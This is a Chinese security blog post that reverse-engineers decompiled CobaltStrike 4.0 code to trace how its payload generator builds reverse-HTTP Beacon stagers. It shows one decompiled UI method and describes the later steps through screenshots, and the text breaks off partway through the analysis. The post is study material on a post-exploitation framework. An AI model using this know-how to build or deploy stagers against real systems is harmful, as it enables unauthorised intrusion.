<!DOCTYPE html>
<html lang="cn">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"cangqingzhe.github.io","root":"/","scheme":"Muse","version":"7.7.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="​        可能我们在后渗透阶段使用CobaltStrike使用的是比较多的，关于一款工具，我们不仅仅只能停留在如何使用它，我们也应该了解一下它实现的原理，本文将带着大家和我一起学习关于CoblatStrike这款工具shell生成的过程还有执行流程。我这里是以CobaltStrike4.0为例来进行分析的。 ​        首先我们将CobaltStrike导入到IDEA中，对着Coba">
<meta property="og:type" content="article">
<meta property="og:title" content="关于CobaltStrike生成shell的过程和执行流程的分析学习">
<meta property="og:url" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="藏青&#39;s BLOG">
<meta property="og:description" content="​        可能我们在后渗透阶段使用CobaltStrike使用的是比较多的，关于一款工具，我们不仅仅只能停留在如何使用它，我们也应该了解一下它实现的原理，本文将带着大家和我一起学习关于CoblatStrike这款工具shell生成的过程还有执行流程。我这里是以CobaltStrike4.0为例来进行分析的。 ​        首先我们将CobaltStrike导入到IDEA中，对着Coba">
<meta property="og:locale" content="cn">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831173535104.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831174257725.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831174544179.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181115893.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181157627.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181808133.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831191822995.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831192312035.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831192737834.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831193156043.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203310084.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203430325.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203519702.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203558124.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203712286.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203932934.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831204215357.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901094550546.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901115643729.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901115942287.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901133939693.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901134326360.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901140702963.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901142122258.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901142214196.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901143237412.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901143245238.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901144358493.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901144705204.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901154145081.png">
<meta property="og:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200901154601816.png">
<meta property="article:published_time" content="2020-08-31T09:21:58.000Z">
<meta property="article:modified_time" content="2020-09-02T12:09:56.509Z">
<meta property="article:author" content="藏青">
<meta property="article:tag" content="cobaltstrike">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831173535104.png">

<link rel="canonical" href="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true
  };
</script>

  <title>关于CobaltStrike生成shell的过程和执行流程的分析学习 | 藏青's BLOG</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">藏青's BLOG</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>

</nav>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="cn">
    <link itemprop="mainEntityOfPage" href="https://cangqingzhe.github.io/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="藏青">
      <meta itemprop="description" content="知行合一">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="藏青's BLOG">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          关于CobaltStrike生成shell的过程和执行流程的分析学习
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2020-08-31 17:21:58" itemprop="dateCreated datePublished" datetime="2020-08-31T17:21:58+08:00">2020-08-31</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2020-09-02 20:09:56" itemprop="dateModified" datetime="2020-09-02T20:09:56+08:00">2020-09-02</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/cobaltstrike/" itemprop="url" rel="index">
                    <span itemprop="name">cobaltstrike</span>
                  </a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>​        可能我们在后渗透阶段使用CobaltStrike使用的是比较多的，关于一款工具，我们不仅仅只能停留在如何使用它，我们也应该了解一下它实现的原理，本文将带着大家和我一起学习关于CoblatStrike这款工具shell生成的过程还有执行流程。我这里是以CobaltStrike4.0为例来进行分析的。</p>
<p>​        首先我们将CobaltStrike导入到IDEA中，对着CobaltStrike.jar右键选择-add as libirary,那样我们就可以在IDEA中查看这个包反编译的代码，IDEA反编译代码的还原度还是非常高的。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831173535104.png" alt="image-20200831173535104"></p>
<h3 id="payload-generator"><a href="#payload-generator" class="headerlink" title="payload generator"></a>payload generator</h3><p>​        CobaltStrike所有的ui在aggressor\dialogs\目录下，因此我们如果想要知道在我们点击了某个按键后CobaltStrike执行了什么操作，在这个目录下找就可以了，因为我们想查看在生成paylad的时候执行了什么操作，因此找payload generator就可以了，我们先看一下dialogAction这个方法中的逻辑。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831174257725.png" alt="image-20200831174257725"></p>
<p>​        这个逻辑我们根据生成payload的窗口可能更好理解一些,我把我的分析写到注释里</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831174544179.png" alt="image-20200831174544179"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">public void dialogAction(ActionEvent var1, Map var2) &#123;</span><br><span class="line">    this.options &#x3D; var2;</span><br><span class="line">    boolean var3 &#x3D; DialogUtils.bool(var2, &quot;x64&quot;); &#x2F;&#x2F;判断是否生成x64的payload</span><br><span class="line">    String var4 &#x3D; DialogUtils.string(var2, &quot;listener&quot;); &#x2F;&#x2F;接收listener的值</span><br><span class="line">    this.stager &#x3D; ListenerUtils.getListener(this.client, var4).getPayloadStager(var3 ? &quot;x64&quot; : &quot;x86&quot;); &#x2F;&#x2F;首先调用getListener获取到Listener，再调用getPayloadStager获取stager</span><br><span class="line">    if (this.stager.length &#x3D;&#x3D; 0) &#123; &#x2F;&#x2F;判断stager是否生成成功，如果为空，则报错</span><br><span class="line">        if (var3) &#123;</span><br><span class="line">            DialogUtils.showError(&quot;No x64 stager for listener &quot; + var4);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            DialogUtils.showError(&quot;No x86 stager for listener &quot; + var4);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        Map var5 &#x3D; DialogUtils.toMap(&quot;ASPX: aspx, C: c, C#: cs, HTML Application: hta, Java: java, Perl: pl, PowerShell: ps1, PowerShell Command: txt, Python: py, Raw: bin, Ruby: rb, COM Scriptlet: sct, Veil: txt, VBA: vba&quot;);  &#x2F;&#x2F;将内容转换为Map形式</span><br><span class="line">        String var6 &#x3D; DialogUtils.string(var2, &quot;format&quot;); &#x2F;&#x2F;从var2这个hashmap中获取键为format对应的值</span><br><span class="line">        String var7 &#x3D; &quot;payload.&quot; + var5.get(var6); &#x2F;&#x2F;拼接内容大概是payload.format</span><br><span class="line">        SafeDialogs.saveFile((JFrame)null, var7, this); &#x2F;&#x2F;调用save方法</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​            我们将下面这句代码扩展分析一下，getListener故名思意就是获取Listener，跟进去后发现会返回一个SCListener对象。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">this.stager &#x3D; ListenerUtils.getListener(this.client, var4).getPayloadStager(var3 ? &quot;x64&quot; : &quot;x86&quot;);</span><br></pre></td></tr></table></figure>

<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181115893.png" alt="image-20200831181115893"></p>
<p>​        我们主要关注一下getPayloadStager是如何运行的，跟进后发现getPayloadStager仅仅返回了Stagers.shellcode的执行结果</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181157627.png" alt="image-20200831181157627"></p>
<p>​        跟进shellcode方法，执行了两个操作，首先调用resolve方法进行解析，返回一个GenericStager对象，再调用这个对象的generate方法。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831181808133.png" alt="image-20200831181808133"></p>
<p>​        跟进resolve看看执行了什么操作，在if中会判断var3是否是x86结构，如果是将this.x86_stagers赋值给var4,再判断var6是否包含var2关键字，如果包含，则调用create方法。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831191822995.png" alt="image-20200831191822995"></p>
<p>​        我们先看看x86_stagers是怎么来的，在Stagers类的开始创建了X86_stagers和x64_stagers，并且调用了Stagers（）这个构造方法，我们可以看到在这个方法中调用了add方法来执行操作</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831192312035.png" alt="image-20200831192312035"></p>
<p>​        再跟进去看看add方法执行了什么操作,首先通过掉用TestAech方法判断是否含有x86或x64,如果正常以后再判断是否是x86，如果是则向x86_stagers则以键值对的形式写入内容，如果不是则向x64_stagers写入内容。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831192737834.png" alt="image-20200831192737834"></p>
<p>​        我们选择一个BeaconHTTPStagerX86来看看，payload函数执行了什么操作，通过下面的代码可以看到返回了windows/beacon_http/reverse_http，其他的payload函数返回的内容类似，就不一一举例了。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831193156043.png" alt="image-20200831193156043"></p>
<p>​        那么var1的内容是什么呢？还是以http x86的stager为例，我们发现它是new BeaconHTTPStagerX86（）后返回的结果。</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203310084.png" alt="image-20200831203310084"></p>
<p>​        那么BeaconHTTPStagerX86在构造方法中又做了什么操作呢，我们通过下面的代码可以看到它调用了父类GenericHTTPStagerX86的构造方法</p>
<p><img src="/2020/08/31/%E5%85%B3%E4%BA%8ECobaltStrike%E7%94%9F%E6%88%90shell%E7%9A%84%E8%BF%87%E7%A8%8B%E5%92%8C%E6%89%A7%E8%A1%8C%E6%B5%81%E7%A8%8B%E7%9A%84%E5%88%86%E6%9E%90%E5%AD%A6%E4%B9%A0/image-20200831203430325.png" alt="image-20200831203430325"></p>
<p>​        跟进GenericHTTPStagerX86的构造方法，发现其又调用了父类GenericHTTPStager的构造方法</p>
